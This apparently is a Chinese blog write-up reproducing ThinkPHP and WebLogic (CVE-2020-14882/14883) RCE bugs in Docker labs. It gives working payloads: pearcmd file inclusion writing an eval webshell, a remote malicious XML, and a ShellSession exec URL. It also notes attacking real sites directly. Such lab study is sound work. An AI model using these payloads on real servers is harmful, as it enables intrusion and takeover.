复现常见的中间件RCE漏洞

已于 2024-08-12 09:44:03 修改
阅读量549 收藏 12
点赞数 21
文章标签: 中间件 web安全 学习 安全威胁分析
于 2024-08-08 17:31:28 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dasdasdasvsdV/article/details/141029886
版权

中间件RCE

中间件RCE

Thinkphp RCE

简介

Thinkphp是一个免费开源的,快速、简单的面向对象的轻量级PHP开发框架,是为了敏捷Web应用开发和简化企业应用开发而诞生的。
2022年12月,Thinkphp被披露出在开启多语言特性的情况下存在文件包含漏洞,攻击者可以通过get、header、cookie等位置传入参数,实现目录穿越+文件包含,通过pearcmd文件包含trick即可实现RCE。

默认情况下,系统只会加载默认语言包,如果需要多语言自动侦测及自动切换,需要在全局的中间件定义文件中添加相关配置,因此只有启用了多语言特性并且使用存在漏洞的版本时才存在漏洞。

漏洞利用条件:
1、多语言特性开启
2、安装pear库
3、知道pearcmd.php路径
4、register_argc_argv = on

环境搭建
docker pull vulfocus/thinkphp:6.0.12 //漏洞版本内
docker run -d -p 8080:80 vulfocus/thinkphp:6.0.12
  • ThinkPHP首页指纹信息,如果在测试某个网站的时候发现了这个页面,同时在网上有该版本的漏洞,那就可以直接拿来攻击了
    在这里插入图片描述

漏洞测试

  • 前端测试是否存在pearcmd,访问路径,如果存在下图中的报错就确认存在
    在这里插入图片描述
  • EXP(指 “Exploit”,利用代码或利用程序,网上可以直接找)
?lang=../../../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/<?
=phpinfo()?>+/var/www/html/paris.php

?lang=../../../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/<?
=@eval($_REQUEST['a']);?>+/var/www/html/paris.php
  • 写入成功
    在这里插入图片描述
  • 居然被url编码了,无所谓,可以抓包在这里插入图片描述
    在这里插入图片描述
  • 成功解析,那么一句话木马同样可以解析在这里插入图片描述

修复

  1. 关闭多语言特性
  2. 升级至最新版本

Weblogic未授权远程命令执行漏洞(CVE-2020-14882,CVE-2020-14883)

简介

2020年Oracle官方发布了数百个组件的高危漏洞公告。其中组合利用 CVE-2020-14882 & CVE-2020-14883 可使攻击者绕过WebLogic后台登录限制,远程代码执行获取WebLogic服务器权限,利用难度极低,风险极大。

  • 原理

CVE-2020-14882:允许未授权的用户绕过管理控制台的权限验证访问后台
CVE-2020-14883:允许后台任意用户通过HTTP协议执行任意命令
这两个漏洞的组合利用,可以让攻击者以未授权的身份登录后台,然后通过GET请求在Weblogic服务器上远程 执行命令。

  • 影响范围
WebLogic 10.3.6.0.0
WebLogic 12.1.3.0.0
WebLogic 12.2.1.3.0
WebLogic 12.2.1.4.0
WebLogic 14.1.1.0.0
  • 下载vulhub,启动Weblogic漏洞(CVE-2020-14882)环境
启动环境
在Vulhub中选择某个环境,进入漏洞目录启动:docker-compose up -d 漏洞测试,Vulhub中所有漏洞环境均配置了详细的说明文档,包括如何编译、启动、原理、复现,详见https://vulhub.org/#/environments/
操作容器
停止:docker-compose stop
开启:docker-compose start
移除:docker-compose down

在这里插入图片描述

漏洞测试

  • 访问 http://your-ip:7001/console 来到登录页面,正常来说肯定是需要账号密码才能登录到后台,这里利用CVE-2020-14882漏洞,访问以下URL,即可未授权访问到管理后台页面:
http://your-ip:7001/console/css/%252e%252e%252fconsole.portal
或
http://your-ip:7001/console/images/%252e%252e%252fconsole.portal
注:%252e%252e%252f 是经过两次URL编码后的../,通过这个就可以实现穿越路径未授权访问后台页面。
  • 进来了,但是没有admin用户,因为是未授权访问进来的
    在这里插入图片描述

观察该页面可看到通过未授权访问的后台与正常登陆的后台相比,由于权限不足,缺少部署等功能,无法安装应用,所以也无法通过部署项目等方式直接获取权限。想要实现服务器RCE,就要借助另外一个漏洞(CVE-2020-14883)。

CVE-2020-14883

通过com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext 类实现,这种方法最早在 CVE-2019-2725(Weblogic反序列化漏洞) 被提出,是一个通杀的方法,对Weblogic的所有版本均有效。此方法需要借助XML文件,通过访问XML文件来执行命令。

  • 构造一个恶意的XML文件,并将其保存在Weblogic可以访问到的服务器上,如http://example.com/rce.xml:
<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.springframework.org/schema/beans
http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
<constructor-arg>
<list>
<value>bash</value>
<value>-c</value>
<value><![CDATA[touch /tmp/paris]]></value> # 新建一个文件paris
</list>
</constructor-arg>
</bean>
</beans>

在这里插入图片描述

  • 传到upload-labs靶场
    在这里插入图片描述
    访问如下xml
http://your-ip:7001/console/images/%252e%252e%252fconsole.portal?
_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.su
pport.FileSystemXmlApplicationContext("http://example.com/rce.xml")
  • 进入到容器里面,文件写入成功,能写文件就能写恶意代码,能写恶意代码就能执行,因此,这是一个高危漏洞
    在这里插入图片描述- 这种利用方法的不足之处,就是需要Weblogic服务器能够访问到恶意XML。如果网站部署在内网且无法访问公网的话,则无法执行XML文件

第二种方法

  • 通过 com.tangosol.coherence.mvel2.sh.ShellSession 类实现,这个利用方法只能在 Weblogic12.2.1 以上版本利用,因为 10.3.6(上面受影响版本中只有这一个低于12.2.1)版本没有这个类。

  • 直接访问如下url

http://your-ip:7001/console/images/%252e%252e%252fconsole.portal?
_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java
.lang.Runtime.getRuntime().exec('touch%20/tmp/paris');")
  • 如下,漏洞利用成功
    在这里插入图片描述
拿不到Root啊
关注
  • 21
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
金蝶云星空RCE漏洞复现
0xSec
06-21 1万+
由于金蝶云星空数据通信默认采用的是二进制数据格式,需要进行序列化与反序列化,在此过程中未对数据进行签名或校验,导致客户端发出的数据可被攻击者恶意篡改,写入包含恶意代码的序列化数据,达到在服务端远程命令执行的效果。该漏洞不仅存在于金蝶云星空管理中心(默认8000端口),普通应用(默认80端口)也存在类似问题。
Apache RocketMQ RCE漏洞复现(CVE-2023-33246)
0xSec
06-01 9396
RocketMQ 5.1.0及以下版本,在一定条件下,存在远程命令执行风险。RocketMQ的NameServer、Broker、Controller等多个组件暴露在外网且缺乏权限验证,攻击者可以利用该漏洞利用更新配置功能以RocketMQ运行的系统用户身份执行命令。此外,攻击者可以通过伪造 RocketMQ 协议内容来达到同样的效果。
RCE漏洞复现
qq_43757105的博客
09-14 964
目录 漏洞描述 漏洞等级 影响版本 准备阶段 RCE漏洞复现具体步骤: Win2008搭建好环境且ip 地址为192.168.132.132​​ Win7可以访问到在win2008 phpstudy 上提前搭建的网站​​ Win7打开bp,设置好代理访问win2008​​ send to repeater​​​​ 在请求行加一行Accept-Charset: 并且还要把“deflated”面的空格删除(不删除无法执行命令) 准备执行命令system('whoami');
解密RCE漏洞:原理剖析、复现与代码审计实战
最新发布
2301_80064376的博客
08-05 793
在网络安全领域,因其严重性和破坏力而备受关注。RCE漏洞允许攻击者在目标系统上执行任意代码,从而掌控整个系统,带来极大的安全风险。理解RCE漏洞的工作原理,并掌握其复现与代码审计技巧,对于提升系统安全性至关重要。本文将深入剖析RCE漏洞的原理,展示如何在实际环境中复现漏洞,并提供详尽的代码审计方法。无论您是网络安全初学者,还是资深开发者,都能从中获得实用的知识和技能。让我们一起解密RCE漏洞,提升我们的安全防护能力。
Redis-RCE漏洞复现
Seizerz的博客
11-19 1787
一、简介 Redis:REmote DIctionary Server(Redis) 是一个由Salvatore Sanfilippo写的key-value存储系统。Redis是一个开源的使用ANSI C语言编写、遵守BSD协议、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。 Redis RCE漏洞来源:https://lorexxar.cn/201...
Tomcat RCE 漏洞复现(CVE-2019-0232)
热门推荐
大哥一声吼
04-18 1万+
漏洞影响范围,直接看官方公告: 总结起来漏洞影响范围如下: tomcat 7.0.04之前 tomcat 8.5.40之前 tomcat 9.0.19之前 版本都会影响 (tomcat 服务器版本在受影响范围内的小伙伴可以打一波补丁了) 测试环境 tomcat 版本8.5.31 jdk版本8.121 漏洞利用前提 修改conf里面的内容 第一处:con...
CVE-2018-1270-Spring Messaging RCE漏洞复现
m0_58596609的博客
04-22 5842
CVE-2018-1270-Spring Messaging RCE漏洞复现
常见中间件漏洞复现
君莫hacker的博客
11-08 8876
常见中间件漏洞复现 中间件Tomcat Apache IIS Jboss Weblogic Nginx 目录tomcat中间件1.tomcat文件上传(CVE-2017-12615) tomcat中间件 1.tomcat文件上传(CVE-2017-12615) 环境:线上环境 vulfocus 影响版本:Tomcat 7.0.0 - 7.0.81
ThinkPHP 多语言模块RCE漏洞复现
0xSec
12-25 3645
ThinkPHP,是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架。最早诞生于2006年初,2007年元旦正式更名为ThinkPHP,并且遵循Apache2开源协议发布。ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重易用性。并且拥有众多原创功能和特性,在社区团队的积极参与下,在易用性、扩展性和性能方面不断优化和改进。
Apache ActiveMQ RCE漏洞复现(CVE-2023-46604)
0xSec
10-26 8187
ActiveMQ是一个开源的消息代理和集成模式服务器,它支持Java消息服务(JMS) API。它是Apache Software Foundation下的一个项目,用于实现消息中间件,帮助不同的应用程序或系统之间进行通信。Apache ActiveMQ 中存在远程代码执行漏洞,Apache ActiveMQ在默认安装下开放了61616服务端口,而该端口并没有对传入数据进行适当的过滤,从而使攻击者能够构造恶意数据以实现远程代码执行。
大华智慧园区综合管理平台RCE漏洞复现(0day)
0xSec
07-15 4662
大华智慧园区设备开放了文件上传功能,但未在上传的文件类型、大小、格式、路径等方面进行严格的限制和过滤,导致攻击者可以通过构造恶意文件并上传到设备上,然后利用该漏洞获取权限并执行任意命令。
微信RCE漏洞复现
m0_46171781的博客
05-02 3307
微信RCE漏洞复现 一、涉及版本: 微信 Windows 版:< 3.1.2.141 根据腾讯安全中心的公告,这是因为chrome浏览器使用的V8引擎存在安全问题导致的。该漏洞仅影响windows版本的PC版微信,且只影响3.2.1.141以下版本 二、复现过程: 1.开启cobalt strike监听 2.使用cobalt strike生成shellcode 3.将生成的shellcode进行处理,将\替换为,0 4.写入js代码中 5.在html文件中调用此js代码 6.在靶机中使用微信
ThinkPHP2-RCE漏洞复现
weixin_73180072的博客
09-10 626
这个函数会接收用户的输入,并将其存储在一个缓存文件中,以供后续使用。然而,由于没有对用户输入进行适当的过滤和验证,攻击者可以构造一个包含恶意代码的输入数据,并将其提交给该函数。当其他用户访问该应用程序时,这些恶意代码就会被执行,攻击者就可以控制整个服务器。造成该漏洞的原因在于ThinkPHP 2.x版本中,某些函数没有对用户输入进行严格的过滤和验证,导致攻击者可以通过构造恶意输入来绕过安全防护,执行恶意代码。攻击者通过利用该漏洞,可以在服务器上执行任意PHP代码,从而控制服务器。成功连接,获取shell。
Apereo CAS 4.1/4.x 反序列化RCE漏洞 漏洞复现
ADummy的博客
02-20 2064
Apereo CAS 4.1反序列化RCE漏洞 by ADummy 0x00利用路线 ​ 构造(可以使用ysoserial)可执行命令的序列化对象—>发送给目标61616端口—>访问web管理页面,读取消息,触发漏洞—>代码执行 0x01漏洞介绍 ​ Apereo CAS是企业级单点登录系统。CAS试图通过Apache Commons Collections库对对象进行反序列化的过程中存在一个问题,该案例引起了RCE漏洞。Apereo Cas一般是用来做身份认证的,所以有一定的攻击
JumpServer RCE漏洞复现
weixin_45945976的博客
09-06 299
JumpServer RCE 一. 漏洞url http://xxx.xxx.xx.xx 二. 漏洞详情 由于 JumpServer 某些接口未做授权限制,攻击者可构造恶意请求获取到日志文件获取敏感信息,或者执行相关API操作控制其中所有机器,执行任意命令。,可以读取jumpserver日志信息,证明漏洞存在。 三. 漏洞复现 1。运行脚本获取 asset_id,system——user,user_id三个值 import asyncio import re import websockets import
CVE-2023-46604- RCE漏洞复现
2301_80115097的博客
11-16 3497
执行上述清理操作后过2分钟再次弹出安全告警,发现服务器再次生成configs.conf文件以及ksoftirqd/0进程,怀疑守护进程未全部清理干净,再次进行检查,发现存在多个守护进程ksoftirqd/0。虽然AMQ的61616端口依然开着,但几天未收到告警,本以为攻击者已经遗忘了我们公司,结果下午收到阿里云封禁服务器的通知,原因是服务器对外进行了DDOS攻击。由于云安全中心没有提示【拦截成功】,且该云账号的云安全中心为免费版,我们认为攻击者大概率入侵成功,必须立刻启动应急响应。
Apache Flink RCE 漏洞复现
weixin_44508748的博客
11-24 729
介绍 Flink核心是一个流式的数据流执行引擎,其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能。基于流执行引擎,Flink提供了诸多更高抽象层的API以便用户编写分布式任务。攻击者可直接在Apache Flink Dashboard页面中上传任意jar包,从而达到远程代码执行的目的。 测试环境:Flink 1.9.1 java8+。Apache Flink 1.9.1安装包下载 https://www.apache.org/dyn/closer.lua/flink/flink-1.9.1
向日葵rce漏洞复现
weixin_59872639的博客
03-01 3097
向日葵 向日葵远程控制是一款提供远程控制服务的软件。向日葵远程控制支持主流操作系统Windows、Linux、Mac、Android、iOS跨平台协同操作,在任何可连入互联网的地点,都可以轻松访问和控制安装了向日葵远程控制客户端的设备 影响版本 向日葵个人版 for Windows <= 11.0.0.33 向日葵简约版 <= V1.0.1.43315(2021.12) 漏洞复现 PortScan探测或其他工具探测40000到65535的开放端口 浏览器访问ip+端口号+ /c.
Apereo-cas4.1 反序列化 Rce漏洞复现
m0_58596609的博客
01-19 4969
Apereo-cas4.1 反序列化Rce漏洞复现
thinkphp5.0.23rce漏洞复现
09-22
ThinkPHP 5.0.23版本之前存在一个远程代码执行(RCE)的漏洞漏洞的形成原因是在获取method的方法中未正确处理方法名,导致攻击者可以调用Request类的任意方法并构造利用链,从而导致远程代码执行漏洞。具体的漏洞利用过程如下: 1. 访问靶机地址和端口号,进入首页。 2. 使用Burp抓包工具修改传参方式为POST,传入参数为"_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd",其中pwd是系统执行命令的参数。 3. 接着进行漏洞复现过程,首先在Kali docker容器中启动此漏洞环境。 4. 使用浏览器访问Kali的IP地址接上8080端口。 5. 再次使用Burp抓包工具,修改传参方式为POST,URL后接入/index.php?s=captch,传入参数为"_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd"。 6. 点击Burp中的Go按钮,尝试写入phpinfo。 7. 成功后,写入一句话木马,密码为aaa。 8. 进一步操作,可以上蚁剑。 漏洞复现成功后,您可以参考这篇文章了解更多细节:[https://www.cnblogs.com/zenb/p/14537240.html](https://www.cnblogs.com/zenb/p/14537240.html)。如果您对此漏洞有更多疑问,欢迎提出。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值